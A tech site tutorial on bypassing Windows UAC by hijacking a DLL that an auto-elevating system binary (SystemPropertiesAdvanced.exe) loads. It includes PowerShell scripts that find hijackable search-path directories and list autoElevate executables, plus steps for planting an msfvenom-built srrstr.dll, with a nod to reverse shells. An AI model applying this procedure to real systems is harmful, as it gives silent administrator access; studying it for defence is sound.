Shulou (Shulou.com) 06/02 Report, SLTechnology News & Howtos, Development section. Updated 2025-01-18.
This article explains how a UAC bypass can be achieved through DLL hijacking. The required background is summarized first, followed by a worked demonstration against a Windows system binary.
I. Brief introduction of basic knowledge
UAC:
User Account Control (UAC) is a mechanism introduced by Microsoft in Windows Vista and later versions to protect the system from unwanted changes and to improve the stability and security of the operating system.
Under UAC, members of the Administrators group normally run with a filtered, low-privilege (medium-integrity) token; such accounts are called protected administrators. When an administrative task is performed, the administrator is asked through the consent prompt to elevate, and the task then runs with the full (high-integrity) administrator token.
A standard user who performs an administrative task is asked to supply administrator credentials before the task can run.
DLL file: a dynamic-link library. Most executables are not self-contained; a large part of their code lives in DLLs that the program loads at run time, so nearly every EXE loads one or more DLLs when it starts.
The order in which the loader searches for a DLL at run time (the default order, with SafeDllSearchMode enabled; DLLs that are already loaded into the process or listed under KnownDLLs are resolved before this search begins):
1. The directory the program was loaded from
2. The system directory, i.e. SYSTEM32 (SysWOW64 for a 32-bit process on 64-bit Windows)
3. The 16-bit system directory, i.e. SYSTEM
4. The Windows directory
5. The current working directory
6. The directories listed in the PATH environment variable
The loader tries the highest-priority directory first (the directory the program was loaded from) and falls back to the lower-priority directories in turn only when the DLL is not found. As soon as the DLL is found in a higher-priority directory the search stops, and the lower-priority directories are never consulted. A hijack is therefore possible only when the requested DLL is absent from every directory that precedes a directory the attacker can write to.
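The search order above, and the PATH-based hijack used in section II, can be checked before planting anything. The following script is an added example and is not part of the original article: for a target executable and a DLL name it walks the search order, reports where the loader would first find the DLL, and marks every writable directory the loader reaches before that point. It assumes SafeDllSearchMode is enabled (the default) and does not model KnownDLLs or modules that are already loaded. Writability is tested by creating and deleting a probe file, so it leaves a short-lived file in each directory it can write to.

```powershell
# Added example (not from the original article): walk the DLL search order for
# a given executable and DLL name and flag directories where a hijack could be
# planted. Assumes SafeDllSearchMode is enabled (the Windows default).

function Test-Is32BitImage {
    # Reads the PE header: e_lfanew at 0x3C, then the Machine field after "PE\0\0".
    param([Parameter(Mandatory)][string]$Path)
    $fs = [System.IO.File]::OpenRead($Path)
    try {
        $br = New-Object System.IO.BinaryReader($fs)
        $null = $fs.Seek(0x3C, [System.IO.SeekOrigin]::Begin)
        $peOffset = $br.ReadInt32()
        $null = $fs.Seek($peOffset + 4, [System.IO.SeekOrigin]::Begin)
        $machine = $br.ReadUInt16()
        return ($machine -eq 0x014c)   # IMAGE_FILE_MACHINE_I386
    } finally {
        $fs.Dispose()
    }
}

function Get-DllSearchOrder {
    param(
        [Parameter(Mandatory)][string]$ExePath,
        [string]$CurrentDirectory = (Get-Location).Path
    )
    $appDir = Split-Path -Parent $ExePath
    # A 32-bit process on 64-bit Windows sees the system directory as SysWOW64.
    $sysDir = if (Test-Is32BitImage -Path $ExePath) { "$env:SystemRoot\SysWOW64" } else { "$env:SystemRoot\System32" }
    $order = @($appDir, $sysDir, "$env:SystemRoot\System", $env:SystemRoot, $CurrentDirectory)
    $order += $env:Path -split ';' | Where-Object { $_ -ne '' }
    return $order
}

function Test-WritableDirectory {
    # Probes by creating and removing an empty file; ACL inspection would be quieter.
    param([Parameter(Mandatory)][string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = [System.IO.Path]::Combine($Dir, [System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-DllHijackCandidate {
    param(
        [Parameter(Mandatory)][string]$ExePath,
        [Parameter(Mandatory)][string]$DllName
    )
    $resolved = $false
    $i = 0
    foreach ($dir in Get-DllSearchOrder -ExePath $ExePath) {
        $i++
        $exists   = Test-Path -LiteralPath ([System.IO.Path]::Combine($dir, $DllName)) -PathType Leaf
        $writable = Test-WritableDirectory -Dir $dir
        [pscustomobject]@{
            Order      = $i
            Directory  = $dir
            DllExists  = $exists
            Writable   = $writable
            # A plant only works in a writable directory that the loader reaches
            # before the first directory that already holds the DLL.
            Hijackable = (-not $resolved) -and (-not $exists) -and $writable
        }
        if ($exists) { $resolved = $true }   # the loader stops at the first hit
    }
}

# The case from section II: a 32-bit auto-elevating binary and a DLL it requests
# but that is not shipped with Windows.
Find-DllHijackCandidate -ExePath "$env:SystemRoot\SysWOW64\SystemPropertiesAdvanced.exe" -DllName 'srrstr.dll' |
    Format-Table -AutoSize
```

A row with DllExists false and Hijackable true is a directory where a DLL of that name would be picked up; on a default Windows 10 user profile the per-user WindowsApps PATH entry is the one that typically shows up.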
Auto-elevating executables:
Some executables are elevated automatically when they are run and do not trigger a UAC prompt. Their embedded application manifest contains the element <autoElevate>true</autoElevate>; Windows honours it only for Microsoft-signed binaries located in trusted directories such as System32.
How to check whether an executable's manifest contains the element:
1. findstr /C:"<autoElevate>true</autoElevate>" xxx.exe (the manifest is stored as plain text in the PE's resources, so a raw text search of the file is enough)
2. Use sigcheck (the Sysinternals digital signature tool) with the -m switch to dump the manifest
Tool link:
Https://docs.microsoft.com/zh-cn/sysinternals/downloads/sigcheck
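The manual findstr check above can be turned into an inventory. The script below is an added example and not part of the original article: it scans System32 and SysWOW64, extracts the embedded manifest from each EXE by a raw text search of the file bytes (the same trick the findstr command relies on), and lists the binaries whose manifest declares autoElevate, together with the requested execution level and the Authenticode signer, since auto-elevation is only honoured for Windows-signed binaries.

```powershell
# Added example (not from the original article): list executables whose
# embedded manifest contains <autoElevate>true</autoElevate>.
param(
    [string[]]$Directories = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64")
)

function Get-EmbeddedManifest {
    # The manifest lives in the RT_MANIFEST resource as UTF-8 XML, so it can be
    # located by a text search over the raw file without parsing the PE.
    param([Parameter(Mandatory)][string]$Path)
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    $text  = [System.Text.Encoding]::ASCII.GetString($bytes)
    if ($text -match '(?s)<assembly[^>]*>.*?</assembly>') { return $Matches[0] }
    return $null
}

function Test-AutoElevate {
    param([Parameter(Mandatory)][string]$Path)
    $manifest = Get-EmbeddedManifest -Path $Path
    if (-not $manifest) { return $null }
    $auto  = $manifest -match '<autoElevate>\s*true\s*</autoElevate>'
    $level = if ($manifest -match 'level="([^"]+)"') { $Matches[1] } else { 'n/a' }
    [pscustomobject]@{
        Path           = $Path
        AutoElevate    = $auto
        ExecutionLevel = $level
        # Auto-elevation only applies to Microsoft-signed binaries in trusted
        # locations, so record who signed the file.
        Signer         = (Get-AuthenticodeSignature -FilePath $Path).SignerCertificate.Subject
    }
}

$results = foreach ($dir in $Directories) {
    Get-ChildItem -Path $dir -Filter *.exe -File -ErrorAction SilentlyContinue |
        ForEach-Object { Test-AutoElevate -Path $_.FullName } |
        Where-Object { $_ -and $_.AutoElevate }
}

$results | Sort-Object Path | Format-Table -AutoSize
```

Run it from a normal (non-elevated) PowerShell session; it only reads the files. SystemPropertiesAdvanced.exe, used in section II, appears in the output for both directories.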
The demonstration below uses an auto-elevating executable and writes a malicious DLL into a directory on its DLL search path that the user can write to, i.e. it performs DLL hijacking:
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
II. Bypassing the UAC mechanism through DLL hijacking
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe is used here as the target of the DLL hijack that bypasses UAC.
1. First confirm that the executable's manifest contains <autoElevate>true</autoElevate>; it does, so the procedure can proceed.
2. Use Process Monitor to observe which DLLs SystemPropertiesAdvanced.exe tries to load when it is run.
Add a filter to pick out the DLL loads that fail (for example Process Name is SystemPropertiesAdvanced.exe, Result is NAME NOT FOUND); a DLL that is not found in any of the directories searched before a user-writable one is a hijack candidate:
The per-user WindowsApps directory (%LOCALAPPDATA%\Microsoft\WindowsApps, where the Windows 10 Store keeps its app execution aliases) is on the user's PATH and is writable by the user. Because the loader only reaches PATH entries after failing to find the DLL in all the earlier directories, a DLL that the program requests but that does not exist anywhere else (here srrstr.dll) can be supplied from this directory, hijacking the load and bypassing UAC.
3. Build the payload with msfvenom as a DLL named srrstr.dll, place it in the WindowsApps directory, and have it launch cmd.exe. The target lives under SysWOW64 and is therefore a 32-bit process, so the DLL must be 32-bit as well.
4. Run SystemPropertiesAdvanced.exe again to observe the hijack; UAC has been bypassed. (Note: the malicious DLL does not forward calls to a legitimate copy, so the hijacked program cannot run normally and may crash. The DLL here only spawns cmd.exe; even if the hijacked program crashes, the command prompt still appears, so this has little effect on the result.) The new cmd.exe runs without a UAC prompt, which can be verified by launching regedit from it:
As shown, cmd.exe is now running at High integrity (whoami /groups reports Mandatory Label\High Mandatory Level):
A reverse-shell session can be obtained by the same DLL hijack by changing only the payload; the effect is as follows:
This concludes the walkthrough of a UAC bypass through DLL hijacking of an auto-elevating executable.